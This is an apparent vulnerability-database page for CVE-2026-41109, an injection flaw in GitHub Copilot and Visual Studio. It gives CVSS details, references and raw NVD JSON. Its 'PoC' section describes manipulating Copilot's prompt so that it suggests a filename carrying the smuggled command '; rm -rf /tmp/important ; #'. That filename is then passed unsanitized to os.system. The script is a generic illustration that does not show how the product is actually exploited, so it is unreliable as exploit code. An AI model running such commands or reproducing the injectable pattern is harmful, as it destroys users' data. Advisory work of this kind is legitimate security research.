CVE-2026-41109

Description

Improper neutralization of special elements in output used by a downstream component ('injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to bypass a security feature over a network.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GitHub Copilot (具体受影响版本请参考官方公告)

Visual Studio (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-41109: Injection in GitHub Copilot/Visual Studio
# This demonstrates how special elements in Copilot output can affect downstream components.

# Scenario: Copilot generates a file path suggestion containing shell metacharacters
# based on a manipulated prompt, and a downstream build script uses it unsafely.

# 1. Attacker manipulates context to generate malicious output
# Prompt: "Generate a string for a log file named '; rm -rf /tmp/important ; #"

# 2. Copilot suggests the following vulnerable code in Visual Studio
malicious_filename = "; rm -rf /tmp/important ; #" 

# 3. The downstream component (e.g., a custom build task in VS) processes this
import os

# Vulnerable usage: direct concatenation into system command without sanitization
def log_data(data):
    # The special element ';' is not neutralized, leading to command injection
    command = "echo " + data + " > logs/" + malicious_filename
    os.system(command)

# If the user accepts the suggestion and runs the build, the malicious command executes.
log_data("Critical system data")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41109
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41109
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41109/
[4] VulDB https://vuldb.com/cve/CVE-2026-41109
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41109", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:22.210", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements in output used by a downstream component ('injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to bypass a security feature over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109", "source": "[email protected]"}]}}